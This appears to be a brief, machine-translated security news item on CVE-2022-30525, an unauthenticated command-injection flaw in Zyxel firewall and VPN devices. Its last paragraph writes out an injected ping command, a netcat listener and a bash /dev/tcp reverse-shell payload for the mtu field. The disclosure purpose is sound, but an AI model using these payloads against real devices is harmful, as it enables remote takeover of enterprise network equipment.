in Zyxel’s ATP, VPN, and USG FLEX series devices designed for enterprise firewalls, IDS, and VPNs has been identified critical vulnerability (CVE-2022-30525) To carry out an attack, an attacker must be able to send requests to the device via the HTTP/HTTPS protocol. Zyxel vulnerability in the ZLD 5.30 firmware update. According to the Shodan service, there are currently 16,213 potentially vulnerable devices on the global network that accept requests via HTTP/HTTPS.
Operation is performed by sending specially designed commands to the /ztp/cgi-bin/handler web handler, accessible without authentication. The problem caused by the lack of proper cleaning of query parameters when executing commands in the system using the os.system call used in the lib_wan_settings.py library and performed when processing the setWanPortSt operation.
For example, an attacker could pass in the mtu field the string “; ping 192.168.1.210;” which will cause the system to execute the “ping 192.168.1.210” command. To get access to the command shell, you can run “nc -lvnp 1270″ on your system, and then initiate a reverse connection (reverse shell) by sending a request to the device with the parameter ‘; bash -c \”exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\”;’.